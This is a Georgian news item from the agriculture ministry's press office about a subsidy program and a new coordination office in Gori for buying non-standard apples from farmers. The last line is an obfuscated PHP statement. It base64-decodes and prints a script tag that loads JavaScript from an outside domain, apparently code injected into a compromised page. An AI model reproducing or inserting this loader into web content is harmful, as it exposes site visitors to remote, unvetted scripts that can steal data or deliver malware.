celsiusi
ავერსი საქკაბელი

 საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა, ოთარ შამუგიამ გორში, არასტანდარტული ვაშლის რეალიზაციის ხელშეწყობის საკოორდინაციო შტაბი გახსნა.

მინისტრმა საკოორდინაციო შტაბში სამუშაო შეხვედრა გამართა. შეხვედრას შიდა ქართლის სახელმწიფო რწმუნებულის მოადგილე სიმონ გულედანი, გორის მერი ვლადიმერ ხინჩეგაშვილი, ვაშლის გადამმუშავებელი საწარმოების წარმომადგენლები და საკოორდინაციო შტაბში დასაქმებული ადგილობრივი ახალგაზრდები ესწრებოდნენ.

საკოორდინაციო შტაბში 40-ზე მეტი ადგილობრივი ახალგაზრდა დასაქმდა.

„ჩვენ წლებია, ვეხმარებით ფერმერებს არაერთი მიმართულებით, მათ შორის არის ვაშლი, რომლის მოსავლის აღების პროცესი უკვე იწყება. როგორც გასულ წელს, წელსაც, მთავრობის გადაწყვეტილებით, ისეთ ვაშლზე, რომლის ბაზარზე რეალიზაცია ვერ განხორციელდება, გავცემთ სუბსიდიას. შარშან, ამ პროგრამის ფარგლებში, დაახლოებით სამოცდაათი ათასი არასტანდარტული ვაშლი გადამუშავდა და დაახლოებით ოც მილიონ ლარამდე შემოსავალი მიიღეს ამ გზით ფერმერებმა. მნიშვნელოვანია, რომ მათ არასტანდარტული ვაშლისგან დამატებითი შემოსავალი ჰქონდეთ“, – განაცხადა ოთარ შამუგიამ.

როგორც შიდა ქართლის სახელმწიფო რწმუნებულის მოადგილემ, სიმონ გულედანმა განაცხადა, გორში, საკოორდინაციო ჯგუფმა, რომელიც მომდევნო რამდენიმე თვეში არასტანდარტული ვაშლის ორგანიზებულ ჩაბარებას უზრუნველყოფს, უკვე დაიწყო მუშაობა და აღნიშნული პროგრამა ფერმერებს მოყვანილი პროდუქციის რეალიზებას გაუადვილებს. სახელმწიფო პროგრამის ფარგლებში, სოფლის განვითარების სააგენტო ერთ კგ არასტანდარტულ ვაშლზე 10 თეთრის ოდენობის სუბსიდიას გასცემს. სახელმწიფო სუბსიდიას მიიღებენ ხილის გადამმუშავებელი ის კომპანიები, რომლებიც 2023 წლის 15 დეკემბრამდე ფერმერებისგან ერთ კგ არასტანდარტულ ვაშლს არანაკლებ 24 თეთრად შეისყიდიან. სახელმწიფო პროგრამაში, საქართველოს მასშტაბით, 20-მდე საწარმო ჩაერთვება. წელს, ვაშლის მოსავლის საპროგნოზო მაჩვენებელია – 120 ათასი ტონა. სახელმწიფო პროგრამის ფარგლებში სავარაუდოდ, 50 ათასი ტონა არასტანდარტული ვაშლის გადამუშავება იგეგმება.

ინფორმაციას სოფლის მეურნეობის სამინისტროს პრესსამსახური ავრცელებს.

531
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");